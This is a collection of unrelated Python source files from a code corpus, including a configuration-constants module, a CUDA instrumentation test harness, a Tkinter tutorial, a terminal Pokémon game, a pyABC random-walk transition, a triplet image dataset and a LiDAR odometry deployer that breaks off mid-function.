self.logFile = logFile
except:
print "Failed in putting together xfminvert command"
print "Unexpected error: ", sys.exc_info()
self.finalizeCommand()
self.setName()
def finalizeCommand(self):
self.inputFiles.append(self.xfm)
self.outputFiles.append(self.output)
self.cmd += ["xfminvert", "-clobber", self.xfm, self.output]
def setName(self):
self.name = "xfminvert "
| StarcoderdataPython |
51282 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Constant settings for Cowbird application.
Constants defined with format ``COWBIRD_[VARIABLE_NAME]`` can be matched with corresponding
settings formatted as ``cowbird.[variable_name]`` in the ``cowbird.ini`` configuration file.
.. note::
Since the ``cowbird.ini`` file has to be loaded by the application to retrieve various configuration settings,
constant ``COWBIRD_INI_FILE_PATH`` (or any other `path variable` defined before it - see below) has to be defined
by environment variable if the default location is not desired (ie: if you want to provide your own configuration).
"""
import logging
import os
import re
from typing import TYPE_CHECKING
from pyramid.settings import asbool
from pyramid.threadlocal import get_current_registry
if TYPE_CHECKING:
# pylint: disable=W0611,unused-import
from typing import Optional
from cowbird.typedefs import AnySettingsContainer, SettingValue
# ===========================
# path variables
# ===========================
COWBIRD_MODULE_DIR = os.path.abspath(os.path.dirname(__file__))
COWBIRD_ROOT = os.path.dirname(COWBIRD_MODULE_DIR)
COWBIRD_CONFIG_DIR = os.getenv(
"COWBIRD_CONFIG_DIR", os.path.join(COWBIRD_ROOT, "config"))
COWBIRD_CONFIG_PATH = os.getenv("COWBIRD_CONFIG_PATH") # default None, require explicit specification
COWBIRD_INI_FILE_PATH = os.getenv(
"COWBIRD_INI_FILE_PATH", "{}/cowbird.ini".format(COWBIRD_CONFIG_DIR))
def _get_default_log_level():
"""
Get logging level from INI configuration file or fallback to default ``INFO`` if it cannot be retrieved.
"""
_default_log_lvl = "INFO"
try:
from cowbird.utils import get_settings_from_config_ini # pylint: disable=C0415 # avoid circular import error
_settings = get_settings_from_config_ini(COWBIRD_INI_FILE_PATH, section="logger_cowbird")
_default_log_lvl = _settings.get("level", _default_log_lvl)
# also considers 'ModuleNotFoundError' derived from 'ImportError', but not added to avoid Python <3.6 name error
except (AttributeError, ImportError): # noqa: W0703 # nosec: B110
pass
return _default_log_lvl
# ===========================
# variables from cowbird.env
# ===========================
# ---------------------------
# COWBIRD
# ---------------------------
COWBIRD_URL = os.getenv("COWBIRD_URL", None) # must be defined
COWBIRD_LOG_LEVEL = os.getenv("COWBIRD_LOG_LEVEL", _get_default_log_level()) # log level to apply to the loggers
COWBIRD_LOG_PRINT = asbool(os.getenv("COWBIRD_LOG_PRINT", False)) # log also forces print to the console
COWBIRD_LOG_REQUEST = asbool(os.getenv("COWBIRD_LOG_REQUEST", True)) # log detail of every incoming request
COWBIRD_LOG_EXCEPTION = asbool(os.getenv("COWBIRD_LOG_EXCEPTION", True)) # log detail of generated exceptions
COWBIRD_ADMIN_PERMISSION = "admin"
# ===========================
# constants
# ===========================
# ignore matches of settings and environment variables for following cases
COWBIRD_CONSTANTS = [
"COWBIRD_CONSTANTS",
"COWBIRD_MODULE_DIR",
"COWBIRD_ROOT",
"COWBIRD_ADMIN_PERMISSION",
# add more as needed
]
# ===========================
# utilities
# ===========================
_REGEX_ASCII_ONLY = re.compile(r"\W|^(?=\d)")
_SETTING_SECTION_PREFIXES = [
"cowbird",
]
_SETTINGS_REQUIRED = [
"COWBIRD_URL",
# FIXME: add others here as needed
]
def get_constant_setting_name(name):
    """
    Find the equivalent setting name of the provided environment variable name.

    Lower-case name and replace all non-ascii chars by `_`.
    Then, convert known prefixes with their dotted name.
    """
    normalized = re.sub(_REGEX_ASCII_ONLY, "_", name.strip().lower())
    for prefix in _SETTING_SECTION_PREFIXES:
        env_style = prefix + "_"
        if normalized.startswith(env_style):
            # Only the leading prefix becomes dotted (e.g. cowbird_x -> cowbird.x).
            return normalized.replace(env_style, prefix + ".", 1)
    return normalized
def get_constant(constant_name,             # type: str
                 settings_container=None,   # type: Optional[AnySettingsContainer]
                 settings_name=None,        # type: Optional[str]
                 default_value=None,        # type: Optional[SettingValue]
                 raise_missing=True,        # type: bool
                 print_missing=False,       # type: bool
                 raise_not_set=True         # type: bool
                 ):                         # type: (...) -> SettingValue
    """
    Search in order for matched value of :paramref:`constant_name`:

    1. search in :py:data:`COWBIRD_CONSTANTS`
    2. search in settings if specified
    3. search alternative setting names (see below)
    4. search in :mod:`cowbird.constants` definitions
    5. search in environment variables

    Parameter :paramref:`constant_name` is expected to have the format ``COWBIRD_[VARIABLE_NAME]`` although any value
    can be passed to retrieve generic settings from all above mentioned search locations.

    If :paramref:`settings_name` is provided as alternative name, it is used as is to search for results if
    :paramref:`constant_name` was not found. Otherwise, ``cowbird.[variable_name]`` is used for additional search when
    the format ``COWBIRD_[VARIABLE_NAME]`` was used for :paramref:`constant_name`
    (i.e.: ``COWBIRD_ADMIN_USER`` will also search for ``cowbird.admin_user`` and so on for corresponding constants).

    :param constant_name: key to search for a value
    :param settings_container: WSGI application settings container (if not provided, uses found one in current thread)
    :param settings_name: alternative name for `settings` if specified
    :param default_value: default value to be returned if not found anywhere, and exception raises are disabled.
    :param raise_missing: raise exception if key is not found anywhere
    :param print_missing: print message if key is not found anywhere, return ``None``
    :param raise_not_set: raise an exception if the found key is ``None``, search until last case if others are ``None``
    :returns: found value or `default_value`
    :raises ValueError: if resulting value is invalid based on options (by default raise missing/``None`` value)
    :raises LookupError: if no appropriate value could be found from all search locations (according to options)
    """
    from cowbird.utils import get_settings, print_log, raise_log  # pylint: disable=C0415 # avoid circular import error
    # (1) protected constants are never overridden by settings or environment
    if constant_name in COWBIRD_CONSTANTS:
        return globals()[constant_name]
    missing = True
    cowbird_value = None
    if settings_container:
        settings = get_settings(settings_container)
    else:
        # note: this will work only after include of cowbird will have triggered configurator setup
        print_log("Using settings from local thread.", level=logging.DEBUG)
        settings = get_settings(get_current_registry())
    # (2) direct lookup in settings under the given name
    if settings and constant_name in settings:  # pylint: disable=E1135
        missing = False
        cowbird_value = settings.get(constant_name)
        if cowbird_value is not None:
            print_log("Constant found in settings with: {}".format(constant_name), level=logging.DEBUG)
            return cowbird_value
    # (3) lookup in settings under the dotted 'cowbird.<name>' alternative
    if not settings_name:
        settings_name = get_constant_setting_name(constant_name)
        print_log("Constant alternate search: {}".format(settings_name), level=logging.DEBUG)
    if settings and settings_name and settings_name in settings:  # pylint: disable=E1135
        missing = False
        cowbird_value = settings.get(settings_name)
        if cowbird_value is not None:
            print_log("Constant found in settings with: {}".format(settings_name), level=logging.DEBUG)
            return cowbird_value
    # (4) module-level definition in cowbird.constants
    cowbird_globals = globals()
    if constant_name in cowbird_globals:
        missing = False
        cowbird_value = cowbird_globals.get(constant_name)
        if cowbird_value is not None:
            print_log("Constant found in definitions with: {}".format(constant_name), level=logging.DEBUG)
            return cowbird_value
    # (5) environment variable of the same name
    if constant_name in os.environ:
        missing = False
        cowbird_value = os.environ.get(constant_name)
        if cowbird_value is not None:
            print_log("Constant found in environment with: {}".format(constant_name), level=logging.DEBUG)
            return cowbird_value
    # reaching here means every location returned either nothing or None
    if not missing and raise_not_set:
        raise_log("Constant was found but was not set: {}".format(constant_name),
                  level=logging.ERROR, exception=ValueError)
    if missing and raise_missing:
        raise_log("Constant could not be found: {}".format(constant_name),
                  level=logging.ERROR, exception=LookupError)
    if missing and print_missing:
        print_log("Constant could not be found: {} (using default: {})"
                  .format(constant_name, default_value), level=logging.WARN)
    # cowbird_value is None at this point, so this effectively returns default_value
    return cowbird_value or default_value
def validate_required(container):
    # type: (AnySettingsContainer) -> None
    """
    Validates that some value is provided for every mandatory configuration setting.

    :raises: when any of the requirements are missing a definition.
    """
    for required_setting in _SETTINGS_REQUIRED:
        # raise_missing/raise_not_set make get_constant fail loudly on any gap
        get_constant(required_setting, settings_container=container, raise_missing=True, raise_not_set=True)
| StarcoderdataPython |
11265408 | <reponame>ganeshutah/FPChecker
import os
import pathlib
import sys
import subprocess
sys.path.insert(1, str(pathlib.Path(__file__).parent.absolute())+"/../../../../parser")
#sys.path.insert(1, '/usr/workspace/wsa/laguna/fpchecker/FPChecker/parser')
from tokenizer import Tokenizer
from instrument import Instrument
RUNTIME='../../../../src/Runtime_parser.h'
prog_1 = """
__device__ double foo(double a);
__device__ void comp(double x) {
if (x = foo(3.0))
x = x*x;
}
"""
def setup_module(module):
    """Run every test from the directory containing this file, so relative
    paths (e.g. the runtime header) resolve consistently."""
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
def teardown_module(module):
    """Remove intermediate compilation artifacts left behind by the tests."""
    subprocess.check_output(["rm -f *.o *.ii *.cu"], stderr=subprocess.STDOUT, shell=True)
def preprocessFile(prog_name: str):
    """Run the CUDA preprocessor (nvcc -E) on <prog_name>.cu, writing <prog_name>.ii."""
    command = 'nvcc -E ' + prog_name + '.cu -o ' + prog_name + '.ii'
    subprocess.check_output([command], stderr=subprocess.STDOUT, shell=True)
def createFile(prog: str, prog_name: str):
    """Write *prog* (plus a trailing newline) to <prog_name>.cu and preprocess it."""
    with open(prog_name + '.cu', 'w') as out:
        out.write(prog + '\n')
    preprocessFile(prog_name)
def instrument(prog_name: str):
    """Run the FPChecker source instrumenter on <prog_name>.cu.

    Uses the preprocessed file (<prog_name>.ii) to locate device declarations
    and assignments, then rewrites the source with _FPC_CHECK_ calls,
    producing <prog_name>_inst.cu.
    """
    # The stray `pass` statement that used to sit here was dead code; removed.
    preFileName = prog_name + '.ii'
    sourceFileName = prog_name + '.cu'
    inst = Instrument(preFileName, sourceFileName)
    inst.deprocess()
    inst.findDeviceDeclarations()
    inst.findAssigments()
    inst.produceInstrumentedLines()
    inst.instrument()
def compileProggram(prog_name: str):
    """Compile the instrumented file with the FPChecker runtime header included.

    (Name misspelling is kept: it is part of the public interface of this module.)
    """
    command = 'nvcc -std=c++11 -c -include ' + RUNTIME + ' ' + prog_name + '_inst.cu'
    subprocess.check_output([command], stderr=subprocess.STDOUT, shell=True)
def countInstrumentationCalls(prog_name: str):
    """Count whitespace-separated tokens containing '_FPC_CHECK_' in
    <prog_name>_inst.cu."""
    total = 0
    with open(prog_name + '_inst.cu', 'r') as src:
        for line in src.readlines():
            total += sum(1 for token in line.split() if '_FPC_CHECK_' in token)
    return total
def inst_program(prog: str, prog_name: str, num_inst: int):
    """Full pipeline: write, instrument and compile *prog*, then verify the
    number of inserted _FPC_CHECK_ calls equals *num_inst*.

    Returns True on success, False (after printing the error) otherwise.
    """
    try:
        createFile(prog, prog_name)
        instrument(prog_name)
        compileProggram(prog_name)
        assert countInstrumentationCalls(prog_name) == num_inst
        return True
    except Exception as exc:
        print(exc)
        return False
def test_1():
    # FPC_VERBOSE makes the instrumenter print progress; any value works.
    os.environ['FPC_VERBOSE'] = '1'
    # prog_1 assigns inside an `if` condition; exactly one check is expected.
    assert inst_program(prog_1, 'prog_1', 1)

# Allow running this test file directly, outside of pytest.
if __name__ == '__main__':
    test_1()
| StarcoderdataPython |
47343 | <filename>Tkinter_Aula11_Gerenciador_de_Layout_GRID.py
#*************************************************************************************************
# GRID LAYOUT MANAGER (tutorial lesson 11)
#*************************************************************************************************
# INCLUDES
from tkinter import*
# CONSTANTS AND DEFINITIONS
# Geometry string: 300x300 pixels, placed at screen offset (200, 200).
resolucao = '300x300+200+200'
# GUI
janela = Tk()
janela.geometry(resolucao)
bt1 = Button(janela, width=5, text='Botão 1')
bt2 = Button(janela, width=5, text='Botão 2')
bt3 = Button(janela, width=5, text='Botão 3')
bt4 = Button(janela, width=5, text='Botão 4')
# Layout
bt1.grid(row=0, column=0) # row/column form the widget's grid address: row 0, column 0
bt2.grid(row=1, column=0)
bt3.grid(row=2, column=2)
bt4.grid(row=3, column=3)
janela.mainloop()
# The Grid layout manager divides the window into rows and columns; each
# widget is placed at an address formed by a row-column pair.
11299580 | <reponame>GoTo-Coders/Competitive-Programming<gh_stars>1-10
# Link --> https://www.hackerrank.com/challenges/sparse-arrays/problem
# Code:
def matchingStrings(strings, queries):
    """Return, for each query, how many times it occurs in *strings*.

    Counts all occurrences once up front with collections.Counter, giving
    O(len(strings) + len(queries)) instead of rescanning *strings* for
    every query (the previous O(n*m) nested loops).
    """
    from collections import Counter
    occurrences = Counter(strings)
    # Counter returns 0 for absent keys, matching the old behaviour.
    return [occurrences[query] for query in queries]
| StarcoderdataPython |
1657714 | <gh_stars>0
import pickle
from pokemon import *
from pessoa import *
def escolher_pokemon_incial(player):
    """Prompt the player to pick one of the three starter pokemons and add
    the chosen one to *player* via player.capturar().

    Loops until a valid choice ("1", "2" or "3") is typed.
    """
    print(f"Olá {player}, agora você deve escolher o pokemon que lhe acompanhará nessa jornada!")
    # The three classic starters, all at level 1.
    pk1 = PokemonAgua("Squirtle", level=1)
    pk2 = PokemonFogo("Charmander", level=1)
    pk3 = PokemonEletrico("Pikachu", level=1)
    print("Você pode escolher entre estes três pokemons:")
    print(f"[1] - {pk1.especie}\n[2] - {pk2.especie}\n[3] - {pk3.especie}")
    while True:
        escolha = str(input("Sua escolha >>> "))
        if escolha == "1":
            player.capturar(pk1)
            break
        elif escolha == "2":
            player.capturar(pk2)
            break
        elif escolha == "3":
            player.capturar(pk3)
            break
        else:
            # Invalid input: warn and ask again.
            print("Você deve escolher 1, 2 ou 3!!!")
def save_game(player):
    """Serialize *player* to 'database.db' in the current directory.

    Errors are reported on stdout; the game keeps running either way.
    """
    try:
        with open("database.db", "wb") as save_file:
            pickle.dump(player, save_file)
        print("Jogo Salvo com sucesso!")
    except Exception as error:
        print("Erro ao salvar")
        print(error)
def load_game():
    """Deserialize and return the player from 'database.db'.

    Returns None (implicitly) when the save file is missing or unreadable.
    """
    try:
        with open("database.db", "rb") as save_file:
            loaded_player = pickle.load(save_file)
        print("Loading feito com sucesso!")
        return loaded_player
    except Exception as error:
        print("Save não encontrado")
if __name__ == '__main__':
    print("_"*50)
    print("Bem Vindo ao pokemon RPG de terminal!")
    print("_"*50)
    # Try to resume a previous session from disk; None means no save exists.
    player = load_game()
    if not player:
        nome = str(input("Olá, qual é o seu nome?\n>>>"))
        player = Player(nome)
        print("Olá esse é um mundo habitado por pokemons, sua missão é se tornar um mestre pokemon!")
        print("Capture pokemons, batalhe, viva essa aventura!")
    player.mostrar_dinheiro()
    if player.pokemons:
        print("Vejo que você já possui pokemons!")
        player.mostrar_pokemons()
    else:
        # New player: pick a starter, then fight a fixed scripted rival.
        print("Vejo que você não possui pokemons! Para começar escolha um destes!")
        escolher_pokemon_incial(player)
        print("Pronto, agora que você já possui pokemon, está na hora da sua primeira batalha!")
        gary = Inimigo("Gary", pokemons=[PokemonAgua("Squirtle", 1)])
        player.batalhar(gary)
        save_game(player)
    # Main game loop: the game auto-saves after each action that changes state.
    while True:
        print("_"*50)
        print("O que deseja fazer?")
        print("[1] Explorar")
        print("[2] Batalhar")
        print("[3] Mostrar Pokeagenda")
        print("[0] Sair do Jogo")
        escolha = str(input(">>>"))
        if escolha == "0":
            print("Saindo do Jogo!")
            sleep(1)
            break
        elif escolha == "1":
            player.explorar()
            save_game(player)
        elif escolha == "2":
            # Battle against a randomly generated enemy.
            player.batalhar(Inimigo())
            save_game(player)
        elif escolha == "3":
            player.mostrar_pokemons()
        else:
            print("Escolha inválida!")
152028 | <reponame>Gabriel-p/pyABC
from typing import Union
import numpy as np
import pandas as pd
import scipy.stats as stats
from ..parameters import Parameter
from .base import DiscreteTransition
class DiscreteRandomWalkTransition(DiscreteTransition):
    """
    This transition is based on a discrete random walk. This may be useful
    for discrete ordinal parameter distributions that can be described as
    lying on the grid of integers.

    .. note::
        This transition does not adapt to the problem structure and thus has
        potentially slow convergence.
        Further, the transition does not satisfy proposal >> prior, so that
        it is indeed not valid as an importance sampling distribution. This
        can be overcome by selecting the number of steps as a random variable.

    Parameters
    ----------
    n_steps: int, optional (default = 1)
        Number of random walk steps to take.
    p_l, p_r, p_c: float
        Probabilities of a left step, right step, and staying in place,
        applied independently per dimension at every step.
    """

    def __init__(
        self,
        n_steps: int = 1,
        p_l: float = 1.0 / 3,
        p_r: float = 1.0 / 3,
        p_c: float = 1.0 / 3,
    ):
        self.n_steps = n_steps
        self.p_l = p_l
        self.p_r = p_r
        self.p_c = p_c

    def fit(self, X: pd.DataFrame, w: np.ndarray):
        # Intentionally a no-op: this transition does not adapt to the
        # samples. self.X and self.w are presumably stored by the base
        # class -- TODO confirm against DiscreteTransition.
        pass

    def rvs_single(self) -> Parameter:
        """Sample one perturbed parameter: pick a weighted start point from
        self.X and add a random walk offset."""
        # take a step
        dim = len(self.X.columns)
        step = perform_random_walk(
            dim, self.n_steps, self.p_l, self.p_r, self.p_c
        )
        # select a start point
        start_point = self.X.sample(weights=self.w).iloc[0]
        # create randomized point
        perturbed_point = start_point + step
        return Parameter(perturbed_point)

    def pdf(
        self, x: Union[Parameter, pd.Series, pd.DataFrame]
    ) -> Union[float, np.ndarray]:
        """
        Evaluate the probability mass function (PMF) at `x`.
        """
        # convert to numpy array in correct order (single point or batch)
        if isinstance(x, (Parameter, pd.Series)):
            x = np.array([x[key] for key in self.X.columns])
        else:
            x = x[self.X.columns].to_numpy()

        # the random walk lives on the integer grid; reject anything else
        if not np.all(np.isclose(x, x.astype(int))):
            raise ValueError(
                f"Transition can only handle integer values, not fulfilled "
                f"by x={x}."
            )

        if len(x.shape) == 1:
            return self._pdf_single(x)
        else:
            return np.array([self._pdf_single(xi) for xi in x])

    def _pdf_single(self, x: np.ndarray):
        # Mixture over all weighted start points: sum_i w_i * P(start_i -> x).
        p = 0.0
        for start, weight in zip(self.X.values, self.w):
            # probability if started from start
            p_start = calculate_single_random_walk_probability(
                start, x, self.n_steps, self.p_l, self.p_r, self.p_c
            )
            # add p_start times the weight associated to p_start
            p += p_start * weight
        return p
def perform_random_walk(dim, n_steps, p_l, p_r, p_c):
    """
    Perform a random walk in [-1, 0, 1] in each dimension, for `n_steps`
    steps. Returns the final offset as a float array of length `dim`.
    """
    position = np.zeros(dim)
    for _ in range(n_steps):
        # one independent left/stay/right increment per dimension
        position += np.random.choice(a=[-1, 0, 1], p=[p_l, p_c, p_r], size=dim)
    return position
def calculate_single_random_walk_probability(
    start,
    end,
    n_steps,
    p_l: float = 1.0 / 3,
    p_r: float = 1.0 / 3,
    p_c: float = 1.0 / 3,
):
    """
    Calculate the probability of getting from state `start` to state `end`
    in `n_steps` steps, where the probabilities for a left, right, and
    no step are `p_l`, `p_r`, `p_c`, respectively. Dimensions are independent,
    so the total probability is the product of the per-dimension ones.
    """
    total = 1.0
    for delta in end - start:
        dim_prob = 0.0
        # Enumerate feasible counts: n_right right-steps, n_left = n_right - delta
        # left-steps, and the remainder staying put.
        for n_right in range(max(int(delta), 0), n_steps + 1):
            n_left = n_right - delta
            n_center = n_steps - n_right - n_left
            dim_prob += stats.multinomial.pmf(
                x=[n_left, n_right, n_center], n=n_steps, p=[p_l, p_r, p_c]
            )
        total *= dim_prob
    return total
def calculate_single_random_walk_probability_no_stay(start, end, n_steps):
    """
    Calculate the probability of getting from state `start` to state `end`
    in `n_steps` steps. Simplified formula assuming the probability to remain
    in a given state is zero in each iteration, i.e. that in every step
    there is a move to the left or right.

    Note that the iteration of this transition is not surjective on the grid
    in dimension dim >= 2.
    """
    total = 1.0
    for delta in end - start:
        # Parity check: with no 'stay' moves, delta and n_steps must match parity.
        if (delta + n_steps) % 2 != 0:
            return 0.0
        n_right = int(0.5 * (n_steps + delta))
        total *= stats.binom.pmf(n=n_steps, p=0.5, k=n_right)
    return total
| StarcoderdataPython |
3559437 | import os
import random
import pandas as pd
from PIL import Image
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
random.seed(16)
class CRC_Dataset(Dataset):
    """Triplet (anchor, positive, negative) image dataset for deep metric
    learning on an emotion-labelled image tree.

    Expects the layout <args.data_dir>/train/<Emotion>/<image files>, where
    <Emotion> is one of the seven keys of ``dir2label`` below.
    """
    def __init__(self, args):
        super(CRC_Dataset, self).__init__()
        self.args = args
        # Deterministic transform applied to anchor, positive and negative.
        self.transformations = transforms.Compose([transforms.Resize((256, 256)),
                                                   transforms.ToTensor(),
                                                   transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                                                        std=[0.229, 0.224, 0.225])
                                                   ])
        # Stochastic augmentation used only for the extra anchor copy.
        # NOTE(review): degrees=(0.180) is the single float 0.18, i.e. a
        # rotation within +/-0.18 degrees; (0, 180) may have been intended.
        self.rand_transforms = transforms.Compose([transforms.RandomApply(transforms=[transforms.RandomRotation(degrees=(0.180)),
                                                                                      transforms.RandomVerticalFlip(),
                                                                                      transforms.RandomHorizontalFlip()]),
                                                   transforms.ToTensor(),
                                                   transforms.RandomErasing(p=0.8),
                                                   transforms.ToPILImage(),
                                                   transforms.Resize((256, 256)),
                                                   transforms.ToTensor(),
                                                   transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                                                        std=[0.229, 0.224, 0.225])
                                                   ])
        # Build the (filepath, label) index. Rows are collected in a plain
        # list and converted to a DataFrame once: DataFrame.append() was
        # removed in pandas 2.0 and was O(n^2) when called per row.
        rows = []
        data_root = os.path.join(args.data_dir, 'train')
        dir2label = {'Anger': 0, 'Boredom': 1, 'Disgust': 2, 'Fear': 3, 'Happiness': 4, 'Neutral': 5, 'Sadness': 6}
        for class_dir in os.listdir(data_root):
            dir_path = os.path.join(data_root, class_dir)
            if os.path.isdir(dir_path):
                for img in os.listdir(dir_path):
                    rows.append({'filepath': os.path.join(dir_path, img),
                                 'label': dir2label[class_dir]})
        self.df = pd.DataFrame(rows, columns=['filepath', 'label'])
        print(f"DML Training dataset contains {len(self.df)} images !!")

    def __len__(self):
        return len(self.df)

    def __getitem__(self, index):
        """Return a dict with the anchor (plus an augmented copy), one
        positive (same label) and one negative (different label) sample."""
        # 1. get the file paths
        anchor_path = self.df.iloc[index]['filepath']
        positive_path, negative_path = None, None
        remaining_list = list(range(len(self.df)))
        remaining_list.remove(index)
        # NOTE(review): the random indices below are drawn in
        # range(len(remaining_list)) but used to index self.df directly, so
        # the sampling is slightly biased; kept as-is to preserve behaviour.
        while True:
            p_rand = random.randint(0, len(remaining_list) - 1)
            if p_rand != index and self.df.iloc[p_rand]['label'] == self.df.iloc[index]['label']:  # same label
                positive_path = self.df.iloc[p_rand]['filepath']
                remaining_list.remove(p_rand)
                break
        while True:
            n_rand = random.randint(0, len(remaining_list) - 1)
            if n_rand != index and self.df.iloc[n_rand]['label'] != self.df.iloc[index]['label']:  # different label
                negative_path = self.df.iloc[n_rand]['filepath']
                remaining_list.remove(n_rand)
                break
        # verification
        assert (positive_path is not None and negative_path is not None)
        assert (self.df.iloc[index]['label'] == self.df.iloc[p_rand]['label'] and self.df.iloc[index]['label'] != self.df.iloc[n_rand]['label'])
        # 2. get the respective images
        anchor_image_ = Image.open(anchor_path).convert('RGB')
        positive_image = Image.open(positive_path).convert('RGB')
        negative_image = Image.open(negative_path).convert('RGB')
        # 3. apply transforms
        anchor_image = self.transformations(anchor_image_)
        positive_image = self.transformations(positive_image)
        negative_image = self.transformations(negative_image)
        anchor_augment = self.rand_transforms(anchor_image_)
        # 4. form the sample dict
        sample = {'anchor_image': anchor_image, 'anchor_path': anchor_path, 'anchor_augment': anchor_augment,
                  'positive_image': positive_image, 'positive_path': positive_path,
                  'negative_image': negative_image, 'negative_path': negative_path
                  }
        return sample
def get_dataloader(args):
    """Wrap a CRC_Dataset for *args* in a shuffled DataLoader."""
    dataset = CRC_Dataset(args)
    return DataLoader(dataset, batch_size=args.batchsize, shuffle=True, num_workers=8)
157813 | <reponame>tallandroid/incubator-marvin
#!/usr/bin/env python
# coding=utf-8
from .prediction_preparator import PredictionPreparator
from .predictor import Predictor
from .feedback import Feedback
| StarcoderdataPython |
307517 | #!/usr/bin/env python3
# Copyright 2021 by <NAME>, Robotic Systems Lab, ETH Zurich.
# All rights reserved.
# This file is released under the "BSD-3-Clause License".
# Please see the LICENSE file that has been included as part of this package.
import copy
import math
import torch
import mlflow
import numpy as np
import utility.plotting
import utility.poses
import utility.projection
import data.dataset
import models.model
import losses.icp_losses
class Deployer(object):
    def __init__(self, config):
        """Set up datasets, projection layer, odometry model and losses from
        the run *config* dict."""
        torch.cuda.empty_cache()

        # Parameters and data
        self.config = config
        self.device = config["device"]
        self.batch_size = config["batch_size"]
        self.dataset = data.dataset.PreprocessedPointCloudDataset(config=config)
        self.steps_per_epoch = int(len(self.dataset) / self.batch_size)
        if self.config["mode"] == "testing":
            # Ground-truth poses are only needed for evaluation plots/metrics.
            self.ground_truth_dataset = data.dataset.PoseDataset(config=self.config)

        # Projections and model
        self.img_projection = utility.projection.ImageProjectionLayer(config=config)
        if self.config["use_jit"]:
            datasets = self.config["datasets"]
            ## Need to provide example tensor for torch jit
            # Shape is (1, 4, V, H) of the first configured dataset --
            # presumably (x, y, z, intensity) channels; TODO confirm.
            example_tensor = torch.zeros((1, 4,
                                          self.config[datasets[0]]["vertical_cells"],
                                          self.config[datasets[0]]["horizontal_cells"]),
                                         device=self.device)
            del datasets
            self.model = torch.jit.trace(
                models.model.OdometryModel(config=self.config).to(self.device),
                example_inputs=(example_tensor, example_tensor))
        else:
            self.model = models.model.OdometryModel(config=self.config).to(self.device)

        # Geometry handler
        self.geometry_handler = models.model_parts.GeometryHandler(config=config)

        # Loss and optimizer
        self.lossTransformation = torch.nn.MSELoss()
        self.lossPointCloud = losses.icp_losses.ICPLosses(config=self.config)
        self.lossBCE = torch.nn.BCELoss()
        # Toggled by training/testing code; controls log_image x-axis scaling.
        self.training_bool = False

        # Permanent variables for internal use (image buffers filled by
        # create_images and consumed by log_image)
        self.log_img_1 = []
        self.log_img_2 = []
        self.log_img_2_transformed = []
        self.log_pointwise_loss = []
        self.log_normals_target = []
        self.log_normals_transformed_source = []
@staticmethod
def list_collate(batch_dicts):
data_dicts = [batch_dict for batch_dict in batch_dicts]
return data_dicts
    def create_images(self, preprocessed_data, losses, plotting):
        """Project target normals and the transformed source scan (with its
        pointwise loss) into 2D range images and cache them in the log_*
        buffers for the next log_image() call. Nothing is written to disk.
        """
        ## Create image of target normals
        image_1_at_normals, _, _, _, _ = self.img_projection(input=torch.cat((
            preprocessed_data["scan_1"],
            preprocessed_data["normal_list_1"]), dim=1), dataset=preprocessed_data["dataset"])
        ## Create image for points where normals exist (in source and target)
        image_2_transformed_and_normals_and_pointwise_loss, _, _, _, _ = \
            self.img_projection(input=torch.cat((plotting["scan_2_transformed"],
                                                 plotting["normals_2_transformed"],
                                                 losses["loss_po2pl_pointwise"]), dim=1),
                                dataset=preprocessed_data["dataset"])
        # Channel layout assumed: [0:3] xyz, [3:6] normals, [6:9] pointwise
        # loss -- TODO confirm against ImageProjectionLayer.
        self.log_pointwise_loss = image_2_transformed_and_normals_and_pointwise_loss[:, 6:9]
        self.log_normals_target = image_1_at_normals[:, 3:6]
        self.log_normals_transformed_source = image_2_transformed_and_normals_and_pointwise_loss[
                                              :, 3:6]
    def log_image(self, epoch, string):
        """Render the cached projection buffers to a PNG under /tmp and
        upload it as an MLflow artifact.

        *string* is appended to the filename; during training the iteration
        index is scaled from epochs to optimization steps.
        """
        utility.plotting.plot_lidar_image(
            input=[self.log_img_1, self.log_img_2, self.log_img_2_transformed,
                   self.log_pointwise_loss, self.log_normals_target,
                   self.log_normals_transformed_source],
            label="target",
            iteration=(epoch + 1) * self.steps_per_epoch if self.training_bool else epoch,
            path="/tmp/" + self.config["run_name"] + "_" + format(epoch, '05d') + string + ".png",
            training=self.training_bool)
        mlflow.log_artifact("/tmp/" + self.config["run_name"] + "_" + format(epoch, '05d') + string + ".png")
def log_map(self, index_of_dataset, index_of_sequence, dataset, data_identifier):
gt_translations = self.ground_truth_dataset.return_translations(
index_of_dataset=index_of_dataset, index_of_sequence=index_of_sequence)
gt_poses = self.ground_truth_dataset.return_poses(
index_of_dataset=index_of_dataset, index_of_sequence=index_of_sequence)
# Extract transformations and absolute poses
computed_transformations = self.computed_transformations_datasets[index_of_dataset][
index_of_sequence]
computed_poses = utility.poses.compute_poses(
computed_transformations=computed_transformations)
# Log things to mlflow artifacts
utility.poses.write_poses_to_text_file(
file_name="/tmp/" + self.config["run_name"] + "_poses_text_file_" + dataset + "_" + format(data_identifier,
'02d') + ".txt",
poses=computed_poses)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_poses_text_file_" + dataset + "_" + format(data_identifier,
'02d') + ".txt")
np.save(
"/tmp/" + self.config["run_name"] + "_transformations_" + dataset + "_" + format(data_identifier,
'02d') + ".npy",
computed_transformations)
np.save(
"/tmp/" + self.config["run_name"] + "_poses_" + dataset + "_" + format(data_identifier, '02d') + ".npy",
computed_poses)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_transformations_" + dataset + "_" + format(data_identifier,
'02d') + ".npy")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_poses_" + dataset + "_" + format(data_identifier, '02d') + ".npy")
utility.plotting.plot_map(computed_poses=computed_poses,
path_y="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_y.png",
path_2d="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_2d.png",
path_3d="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_3d.png",
groundtruth=gt_translations,
dataset=dataset)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_y.png")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_2d.png")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_3d.png")
if gt_poses is not None:
utility.plotting.plot_translation_and_rotation(
